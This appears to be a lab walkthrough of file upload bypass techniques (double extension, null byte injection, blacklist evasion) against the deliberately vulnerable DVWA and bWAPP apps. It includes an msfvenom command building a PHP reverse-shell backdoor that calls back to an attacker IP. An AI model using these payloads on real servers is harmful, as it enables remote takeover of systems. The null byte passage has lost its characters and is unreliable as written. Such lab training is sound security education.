Basic file upload:
A Simple php file will get uploaded on the web server without any restrictions, here server does not check the content- type or file extensions.
Set DVWA Security as Low in level
{Please look image 01}
Create a php backdoor through following command,
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.20.10.3 lport=4444 -f raw
{Please look image 02}
Save the output with PHP extension as img.php
{Please look image 03}
{Please look image 04}
We have successful uploaded a malicious php file and it gave us the directory to where the file is stored.
Before executing the malicious php file which we uploaded, We need make listen on attacker machine with metasploit,
{Please look image 05}
Malicious file is been uploaded to 192.168.93.156/dvwa/hackable/uploads/
{Please look image 06}
I got a meterpreter session when I chose a img.php file, which it gave a reverse connection to an attacker
{Please look image 07}
Double Extension Injection Technique:
For this exercise, We need to change the security level to medium.
{Please look image 08}
This time it didn’t allowed me to upload malicious php file and it says it will only accept JPEG or PNG images.
{Please look image 09}
To bypass this restrictions, We are going to hide the real nature of a file by inserting multiple extension with filename which creates confusion to security parameters.
Change the name of existing malicious file which is img.php to img.php.png
Setting listener with metasploit,
{Please look image 10}
Now, We are uploading a double extension file which is img.php.png
{Please look image 11}
Before uploading, We need to capture the packets with Burpsuite – Interceptor, which will help to change a file extension or to bypass client side security parameter.
Burpsuite – Interceptor captures the fileupload request, We need to change the file extension before uploading to server,
{Please look image 12}
{Please look image 13}
{Please look image 14}
{Please look image 15}
File is been successfully uploaded with the extension php.
We have got a reverse connection when we chose the uploaded malicious file.
Null Byte Injection:
Null byte injection is an exploitation technique which uses URL-encoded null byte characters(i.e. , or 0x00 in hex) to the user-supplied data. A null byte in the URL is represented by ‘’ which in ASCII is a “”(blank space).
This injection process can alter the intended logic of the application and allows malicious adversary to get unauthorized access.
The reason behind inserting a null byte value is, some of the application servers scripting language still using c/c++ libraries to check the filename and content. In c/c++ a line ends with /00 is call null byte.
Hence when the compiler studies a null byte at the end of the string, it will assume that it has arrived at the end of the string and stop further reading of string.
Repeat the same process for creating a backdoor and msfconsole for listener. I have the double extension file which is img3.php.jpg.
We have captured the request with the help of Burpsuite – Interceptor,
16
Added a string to make a null byte at the end of malicious file extension,
17
Image of Hex value,
18
Changing into null byte,
19
Review the RAW data again and there is no string instead a blank space available,
20
21
22
Malicious file is been uploaded successfully.
Started the listener, We have got a reverse connection when we chose the uploaded malicious file,
23
Blacklisting File Extension:
This exercise, We will use bwapp application with medium level security.
24
25
When I tried uploading a malicious file which is img3.php, the extension of php is in blacklisting. To bypass this case sensitive rule or restriction, We use the alternative form of the same file which will PhP, php3.
Filename: img3.php3
The file has been uploaded successfully.
26
27
28
Started reverse TCP handler, We have got a reverse connection when we chose the uploaded malicious file.